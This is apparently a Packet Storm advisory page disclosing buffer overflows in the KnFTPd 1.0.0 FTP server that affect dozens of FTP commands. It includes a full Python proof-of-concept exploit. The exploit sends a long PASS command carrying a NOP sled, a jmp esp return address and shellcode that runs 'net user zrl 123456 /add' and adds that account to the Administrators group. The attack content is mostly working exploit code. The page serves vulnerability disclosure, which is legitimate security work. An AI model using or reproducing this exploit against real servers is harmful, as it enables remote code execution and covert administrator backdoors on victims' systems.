what you don't know can hurt you

KnFTPd 1.0.0 Buffer Overflow

KnFTPd 1.0.0 Buffer Overflow
Posted Sep 2, 2011
Authored by Qixu Liu

KnFTPd FTP server version 1.0.0 suffers from buffer overflow vulnerabilities. Dozens of FTP commands are affected. Proof of concept exploit included.

tags | exploit, overflow, vulnerability, proof of concept
MD5 | 8067b404ed00ba39c2ea5cb169b2886b

KnFTPd 1.0.0 Buffer Overflow

Change Mirror Download
KnFTPd FTP Server v1.0.0 is vulnerable to a buffer overflow caused by improper bounds checking.
By sending an overly long request to Multpile FTP command(USER,PASS,REIN,QUIT,PORT,PASV,TYPE,STRU,MODE,RETR,STOR,
APPE,ALLO,REST,RNFR,RNTO,ABOR,DELE,CWD,LIST,NLST,SITE,STST,HELP,NOOP,MKD,RMD,PWD,CDUP,STOU,SNMT,SYST,XPWD),
a remote attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges or cause the application to crash.

The sample PoC of exploit is shown as follows:
-----------------------------------------------
# !/usr/bin/python
# KnFTPd FTP Server v1.0.0 Multiple Command Remote Buffer Overflow Exploit
# Software Link: http://sourceforge.net/projects/knftp/files/KnFTPd/1.0.0/
# Affected Version:1.0.0
# Affected Command:
# "USER","PASS","REIN","QUIT","PORT","PASV","TYPE","STRU",
# "MODE","RETR","STOR","APPE","ALLO","REST","RNFR","RNTO",
# "ABOR","DELE","CWD","LIST","NLST","SITE","STST","HELP",
# "NOOP","MKD","RMD","PWD","CDUP","STOU","SNMT","SYST","XPWD"
#
# Vulnerability Discovered by Qixu Liu of NCNIPC (liuqx@nipc.org.cn)
# Date: 02/09/2011
# Thanks to: Zhejun Fang, Cheng Luo
# Tested on: Windows XP SP3 Chinese (zh-cn)
# Shellcode: Exploiting "PASS" Command to add a new system user "zrl:123456"

from struct import pack
import socket,sys
import os

if len(sys.argv) != 3:
print "Usage: knftpd_exploit.py [IP] [PORT]"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

shellcode= "\x33\xdb\xb7\x02\x2b\xe3"
shellcode+= "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c"
shellcode+= "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
shellcode+= "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
shellcode+= "\x65\x72\x20\x7a\x72\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x61\x64"
shellcode+= "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
shellcode+= "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
shellcode+= "\x20\x2f\x61\x64\x64\x20\x7a\x72\x6c\x20\x26\x26\x20\x6e\x65\x74\x20"
shellcode+= "\x75\x73\x65\x72\x20\x7a\x72\x6c"

eip ="\x12\x45\xfa\x7f" #jmp esp
eip += "\x90"*8
eip += "\xe9\x06\xff\xff\xff"
nops = "\x90" * 157

payload = "\x90" * 57 + shellcode + "\x90" * 94 +eip

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
connect=s.connect((target, port))
print "[+] Target FTP Connected!"
except:
print "[!] FTP didn't respond\n"
sys.exit(0)

s.send('USER test \r\n')
s.recv(1024)

print "[+] Sending payload...length " +str(len(payload))
s.send('PASS ' + payload +' \r\n')
s.recv(1024)

print "[!] Exploit has been sent!. Please check the new user 'zrl'\n"
s.close()
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close